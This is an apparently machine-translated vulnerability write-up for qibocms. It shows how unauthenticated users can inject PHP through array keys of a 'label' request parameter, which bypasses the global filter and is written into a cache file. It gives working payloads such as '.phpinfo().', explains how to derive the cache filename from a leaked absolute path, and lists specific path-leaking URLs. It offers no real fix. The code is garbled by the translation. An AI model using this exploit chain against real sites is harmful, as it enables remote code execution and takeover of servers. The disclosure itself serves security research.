All open-source systems of qibocms, Getshell

All open-source systems of qibocms, Getshell

Multiple studies will find that Getshell can be used.

Look at all the open-source systems in qibo.

You do not need to log on to Getshell.

I have been struggling with this because it cannot be closed directly.

Ask P God for help.

Use the whole site system for demonstration.
______________________________________________________________________

P.S. Can you send me an invitation code/hx

Detailed description:

Global Filter Function
 

Function Add_S ($ array) {foreach ($ array as $ key => $ value) {if (! Is_array ($ value) {@ eregi ("['\" &] + ", $ key) & die ('error KEY! '); $ Value = str_replace ("& # x", "& # x", $ value ); // filter unsafe characters $ value = preg_replace ("/eval/I", "eva l", $ value); // filter insecure functions! Get_magic_quotes_gpc () & $ value = addslashes ($ value); $ array [$ key] = $ value ;} else {$ array [$ key] = Add_S ($ array [$ key]) ;}} return $ array ;}

It seems that the restoration is perfect.


 

Matched



If the key that is matched for a request like this is asd, the request will not be filtered if it is not matched.
 

In label_module.php, you do not need to log on to any
 

Else {foreach ($ label AS $ key => $ value) {var_dump ($ value); exit; // if a new tag is used, it is an array (), to clear if (is_array ($ value) {$ label [$ key] = '';} // write cache if (time () -filemtime ($ FileName)> ($ webdb [label_cache_time] * 60) {$ _ shows = "<? Php \ r \ n \ $ haveCache = 1; \ r \ n "; foreach ($ label AS $ key => $ value) {$ value = addslashes ($ value ); $ _ shows. = "\ $ label ['$ key'] = stripslashes (' $ value'); \ r \ n";} write_file ($ FileName, $ _ shows. '?> ');}}

Because qibo is

foreach($_POST AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];}foreach($_GET AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];}

Therefore, the variable $ label can be directly controlled.



Then, the keys and values in the array are written directly to the cache file.



Here, because the value global function will be escaped for the first time $ value = addslashes ($ value );

The second escape is \\\'

"\ $ Label ['$ key'] = stripslashes (' $ value'); \ r \ n"

When writing the code, it can be seen that stripslashes will not be executed, but stripslashes will be written into the file.



At this time, the key is used only. Because the global filter function does not perform addslashes on the key (and cannot do addslashes), it will not be escaped and it will be bypassed directly when combined with the above.



This is the case when writing data to a file.


 

 

The key directly contains single quotes and is matched and then exited.

Bypass with the above method.
 

The written code is $ label ['asd ''] = stripslashes ('');

Why is stripslashes ('') empty?

If not empty, escape characters can also be used.

Because we submit index. php? Label [asd '] [asd] = asda', then its value is an array.
 

if(is_array($value)){$label[$key]='';}

It is cleared.

At the beginning, I was struggling. If I closed this [I would need to submit a yu'] # something like this

However, the key in the array is written. If you want to write the key], it becomes

Http://web.com/qibov7/index.php? Label [asd '] [asd] = asda'

[Asd ']. Then, the submitted data is [closed, and the key is still asd'

Then, we have been entangled in this issue ..

Later I asked P shennima to solve the problem for me instantly.



['A'. "$ {phpinfo ()}". ''] given by P God uses double quotation marks for secondary parsing to Getshell

So let's set the key to A'. "$ {phpinfo ()}". '. It does not include].


 

Test whether the task can be executed.


 

An error occurred? Here we use the error blocker

That is, ['A'. "$ {@ phpinfo ()}". ''] The submitted key is A'." $ {@ phpinfo ()}".'


 

 

Executed successfully.



I simplified it later, but it does not need to use double quotation marks for secondary resolution.

[''. Phpinfo ().''] The submitted key is '. phpinfo ().' and can still be directly executed.

The previous thinking has always been to close it. Alas.





___________________________________________________________________________



The content is ready. Let's take a look at the file name.


 

$FileName=ROOT_PATH."cache/label_cache/";if(!is_dir($FileName)){makepath($FileName);}$FileName.=(ereg("\.php",basename($WEBURL))?preg_replace("/\.php(.*)/","",basename($WEBURL)):'index')."_".intval($ch)."_".intval($ch_pagetype)."_".intval($ch_module)."_".intval($ch_fid)."_".intval($city_id).'_'.substr(md5(getTpl("index",$chdb[main_tpl])),0,5).".php";

First, the directory cache/label_cache/

Let's look at the file name.

_". Intval ($ ch ). "_". intval ($ ch_pagetype ). "_". intval ($ ch_module ). "_". intval ($ ch_fid ). "_". intval ($ city_id ). '_'. substr (md5 (getTpl ("index", $ chdb [main_tpl]), 0, 5 ). ". php"



That is, after a series of transformations, except for those variables whose $ ch is 1, we didn't define the intval value and the value is 0.

Index_1_0_0_0_0_substr (md5 (getTpl ("index", $ chdb [main_tpl]),). php

Let's take a look at this getTpl ("index", $ chdb [main_tpl]).

This is actually the absolute path of the template address Website + default template address



The absolute path of the website is used here, so we need to find a path that can leak the absolute path.

There are many places where the absolute path will be leaked.



Http://v7.qibosoft.com/data/label_hf.php

Http://v7.qibosoft.com//do/fontimg.php

Http://v7.qibosoft.com//hack/gather/inc/show_system_fid.php



Take local testing as an Example
 

D: \ ApmServ \ www \ htdocs \ qibov7 \ data \ label_hf.php

The absolute website path is D: \ ApmServ \ www \ htdocs \ qibov7.

Add the default template path/template/default/index.htm

That is D: \ ApmServ \ www \ htdocs \ qibov7/template/default/index.htm

Perform md5 once to get 82e4a1041f04d2edb779e87b37623786

Next, use substr (md5 (getTpl ("index", $ chdb [main_tpl]),) to obtain the first five digits.

Then 82e4a is pieced together.

Then we get the cache/label_cache/index_1_0_0_0_0_82e4a.php
 

Method 2 for file searching

Short file names can be used to guess in windows iis

Windows apache makes it easier.

Direct cache/label_cache/index _~ 1. php
 

You can do it directly.





Of course, you can try to crack the five digits. Haha.
 

Solution:

I am not quite clear about this. You should think about it yourself.



This file is available in every open-source system.



Modify each one.